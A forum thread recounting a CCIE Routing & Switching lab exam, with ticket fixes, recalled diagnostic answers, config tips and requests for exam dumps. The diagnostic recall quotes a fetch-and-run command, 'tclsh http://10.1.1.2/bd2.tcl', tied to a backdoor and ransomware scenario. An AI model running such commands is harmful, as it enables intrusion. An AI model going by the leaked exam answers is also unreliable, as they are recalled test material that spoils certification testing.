balajijsh

Got my CCIE !! TS2/Diag H3/CFG - A4 aka H1 plus


I took my exam on June 14 , 2019 and was able to get my CCIE #.

 

Small Tips :

People might have already shared on this forum but trying to reiterate the same.

 

1. Try to understand the packet flow in each sub section of a lab (TS or config), it will be useful to troubleshoot the issues in exam time

2. In each sub section of lab ( For instance, DC1 in H3 config), practice configuring all protocols at the same time ( OSPF, BGP, STP, DHCP, Multicast and NAT)

3. Practice makes a man perfect. Therefore, there is no substitute for practice.

4. Until you select "Start lab", the timer for TS/Diag doesn't start in the computer. However, the moderator/invigilator has a different set of timings and he clearly mentions them on the board. So please be aware to click on the appropriate buttons on the page.

 

Section TS :

 

Ticket 1 : It took more than 20 minutes to realize that there is "port security" configured in SW410. Because in the practice labs, the faults were mostly in SW400/SW401. Since I understood the packet flow, I was able to crack it.

 

Ticket 2: NAT was not configured (ip nat inside/outside) in R14. Once NAT was configured, traceroute from Server1 in DC1 to ISP got matched exactly

 

Ticket 3:

Fault 1: iBGP neighborship between R22 and R23 (BGP RRs) was down. In R23, the lo0 interface was part of a different OSPF ID.

Fault 2 : Advertised R12-R22 link and R13-R23 link on both R12 and R13( should not advertise on R22 and R23) to exactly match the traceroute output requested.

 

Ticket 4:

Fault 1 : R10 was advertising higher LP for Large Office (10.4) and Medium Office ( 10.5) networks. Two solutions - reduce LP in R10 or increase LP in R12

Fault 2 : BGP cost community attribute used in R20/R21. We can use the command to ignore the cost community in best path calculation and also increase OSPF cost of R20 Lo0

 

Ticket 5 : DMVPN tunnel parameter mismatch. Traceroute expected from Server1 to small office vlan 100/101. Therefore OSPF between R60 and SW600 need to be established.

Spoke to spoke communication(R60, R51) has to be verified. This is very important

 

Ticket 6: IPv6 DHCP server configuration needed to be added on Vlan 2001 in SW111

 

Ticket 7: MPLS password mismatch between peers in the MPLS VPN network (CISCO and CISC0 - Note the alphabet "O" and number "0") - This was a very subtle difference and I was not able to crack it during exam hours - I actually removed the password and traceroute worked but probably might have lost marks for it.

 

Ticket 8 : DHCP server in HQ was providing incorrect GW ( Vlan 2001 HSRP IP was provided as GW to user in Vlan 2000 and vice versa). Modify the GW in DHCP server configuration and increase the DHCP lease timer to infinity.

 

Ticket 9 :

Fault 1 :NAT was incorrectly configured in R71. ( IP nat inside missing on the interface facing R70/NAS).

Fault 2 : DMVPN tunnel key mismatch between R24 and R71. Please remember to Copy paste the tunnel key from DMVPN HUB (R24) into Spoke (R71) and not vice versa

 

Ticket 10 :

Couldn't crack the NAT configuration. There was ACL configured on Server2 to permit only a few networks. I had inadvertently removed it without copying the existing config.

 

I used the whole 2 hours and additional 30 minutes but couldn't find solution in R24/R25.

 

 

Section Diag :

 

H3 diag

 

Need to select the following options from drop down list

1.

 

a. show ip dhcp relay information trusted sources

b. Search for the first "DHCP discover" packet with source IP 0.0.0.0 in the packet capture and select the packet no

c. Highlight link between SW1-SW3

 

2. Attacker is 10.1.1.1, Server 10.1.1.2

 

a. Select the following options for question

 

TCP connection from a remote host to the router’s IP address 10.1.1.1 on port 1337

TCP connection from the router to 10.1.1.2

Download of a TCL script in memory via HTTP

Installment of a ransomware via a backdoor

 

b. sudo poweroff

 

c. tclsh http://10.1.1.2/bd2.tcl

 

 

Section Config :

 

Config lab as per SPOTO it's termed "A4" and in cert collection forums it's termed "H1 plus"

 

Same as in WB. There will be additional VRFs(Yellow VRF) configured on R6 and R7 in the MPLS VPN (AS 12345). But eBGP neighborship has to be established as per requirement.

 

Questions were very precise. The network diagrams were very clear and easy to understand. Configuration was easy as I had practised well and I was able to complete them in 3 hours 15 minutes.

 

Then went for a walk outside the building for 15 minutes. Came back and finished all verifications (Traceroute outputs, Ping).

 

Use the command "no mpls ip propagate-ttl" to disable MPLS TTL propagation and match traceroute. Add weight in R20 towards R3 (INET VRF) because traceroute was very specific to go via R3 at all times.

 

Good luck everyone !

 

 

In Diag, I would like to know : when you filter wireshark with cmd "bootp"

Which IP address was the source and destination? Attacker is 10.1.1.1? , Server 10.1.1.2?

little bit confusing.

 

Thanks again and congrats!


Hello,

Congratz

 

same question about diag :

 

Which IP address was the source and destination? Attacker is 10.1.1.1? , Server 10.1.1.2?


Just interested if there were other CCIE RS candidates with you in the room? Did they mention what version of TS/DIAG/CONFIG they get? I booked my lab for August and I am interested to understand if there is really a new Config Lab as some people are discussing on this forum?

 

Thanks


Hi,

 

Where can we download a workbook for all three sections?

Hidden Content

    Give reaction to this post to see the hidden content.

 

This is the latest dump in the forum as far as I know.

 

Please inform me too if you have a better/newer dump.


GREAT feedback! can you share link of the materials you are using?



One other CCIE RS candidate passed on the same day. He got TS2 //Diag not sure//Config-H3



The options I selected in the diag for this query are listed below. Please extrapolate the Diag query as appropriate

 

TCP connection from a remote host to the router’s IP address 10.1.1.1 on port 1337

TCP connection from the router to 10.1.1.2

Download of a TCL script in memory via HTTP

Installment of a ransomware via a backdoor

Edited by balajijsh


many thanks for the feedback.

I would like to know the reason of adding VRF YELLOW since the traffic is going through R3 anyway to the network 10.2.x.x. Is there any particular reason for that??

 

Thanks and enjoy your number


good job...enjoy!!

 

Hi First of all Congratulations.

I have been thinking about the Ticket#10 which is also in SPOTO Solution as below: (Please try to recall if you faced similar config or different)?

 

Server2#sh run | s line vty 0 4

line vty 0 4

access-class 1 in

password cisco

login

transport input telnet

 

Server2#sh run | s access

access-list 1 permit 201.99.25.70

access-list 1 permit 10.2.0.0 0.0.255.255

access-list 1 permit 10.200.0.0 0.0.0.255

201.99.25.70 is IP address used from NAT at R24/R25

 

ip nat outside source static 201.99.70.2 201.99.25.70

Format:

Ip nat outside source static outsideLOCAL outsideGLOBAL

This outsideGLOBAL ip add can be found from R24/R25 BGP Table.

2nd Q: Can you explain a little more about TICKET#4 FAULT:2; how much cost value did you use for R20-interface lo0 and was it asked that don't touch to BGP attribute to solve in this Question?
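
As an added illustration (not part of any post in this thread, and not Cisco's code), the Python sketch below evaluates the standard ACL quoted in the post above with IOS-style wildcard matching, showing why a Telnet source reaches the vty lines only when it arrives as 201.99.25.70 or from one of the two permitted ranges. The function names are hypothetical and the 10.x test sources are constructed.

```python
import ipaddress

# ACL lines as quoted in the post above (Server2, access-list 1).
ACL_TEXT = """\
access-list 1 permit 201.99.25.70
access-list 1 permit 10.2.0.0 0.0.255.255
access-list 1 permit 10.200.0.0 0.0.0.255
"""

def _to_int(dotted):
    return int(ipaddress.IPv4Address(dotted))

def parse_standard_acl(text):
    """Return (action, address, wildcard) integer tuples, in config order."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != "access-list":
            continue
        action, rest = parts[2], parts[3:]
        if rest[0] == "any":
            addr, wildcard = "0.0.0.0", "255.255.255.255"
        elif rest[0] == "host":
            addr, wildcard = rest[1], "0.0.0.0"
        else:
            # A bare address with no wildcard is a host entry.
            addr = rest[0]
            wildcard = rest[1] if len(rest) > 1 else "0.0.0.0"
        entries.append((action, _to_int(addr), _to_int(wildcard)))
    return entries

def evaluate(entries, source):
    """First match wins; anything unmatched hits the implicit deny."""
    src = _to_int(source)
    for action, addr, wildcard in entries:
        care = ~wildcard & 0xFFFFFFFF  # wildcard 0-bits must match exactly
        if (src & care) == (addr & care):
            return action
    return "deny"

def check_sources(sources):
    entries = parse_standard_acl(ACL_TEXT)
    return {s: evaluate(entries, s) for s in sources}

if __name__ == "__main__":
    # 201.99.x.x addresses are from the post; 10.x sources are constructed.
    samples = ["201.99.25.70", "201.99.70.2", "10.2.200.1",
               "10.200.0.9", "10.200.1.9"]
    for src, verdict in check_sources(samples).items():
        print(f"{src:15} -> {verdict}")
```

The same host is denied when it shows up as 201.99.70.2, which is why deleting the ACL hides the fault instead of fixing it.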
